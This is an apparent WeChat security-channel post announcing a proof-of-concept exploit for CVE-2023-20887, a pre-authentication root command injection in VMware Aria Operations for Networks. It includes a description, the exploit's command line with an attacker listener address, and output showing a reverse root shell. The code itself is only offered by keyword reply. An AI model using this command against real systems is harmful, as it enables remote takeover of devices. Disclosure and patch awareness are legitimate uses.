Skip to content

Latest commit

 

History

History
66 lines (29 loc) · 2.23 KB

[Khan安全攻防实验室]-2023-6-21-POC速递 - VMWare RCE CVE-2023-2087.md

File metadata and controls

66 lines (29 loc) · 2.23 KB

POC速递 - VMWare RCE CVE-2023-2087

Khan安全攻防实验室

Khan安全攻防实验室

微信号 KhanCJSH

功能介绍 安全不是一个人,我们来自五湖四海。研究方向Web内网渗透,免杀技术,红蓝攻防对抗,CTF。


__发表于

收录于合集

    VMWare Aria Operations for Networks (vRealize Network Insight) 在通过 Apache Thrift RPC 接口接受用户输入时容易受到命令注入的攻击。此漏洞允许远程未经身份验证的攻击者以 root 用户身份在底层操作系统上执行任意命令。RPC 接口受可以绕过的反向代理保护。VMware 已将此问题的严重性评估为处于严重严重性范围内,最高 CVSSv3 基本分数为 9.8。恶意行为者可以在设备的“root”上下文中远程执行代码。VMWare 6.x 版本易受攻击。


python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)(*) Starting handler(+) Received connection from 192.168.116.100(+) pop thy shell! (it's ready)sudo bashiduid=0(root) gid=0(root) groups=0(root)hostnamevrni-platform-release

缓解措施

https://www.vmware.com/security/advisories/VMSA-2023-0012.html

POC下载地址

点击下方名片进入公众号、回复关键字【0616】获取下载链接

免责声明:本项目仅用于教育和道德测试。在未经事先相互同意的情况下使用此工具攻击目标是非法的。开发者不承担任何责任,也不对本工具造成的任何误用或损害负责。

预览时标签不可点

微信扫一扫
关注该公众号

知道了

微信扫一扫
使用小程序


取消 允许


取消 允许

: , 。 视频 小程序 赞 ,轻点两下取消赞 在看 ,轻点两下取消在看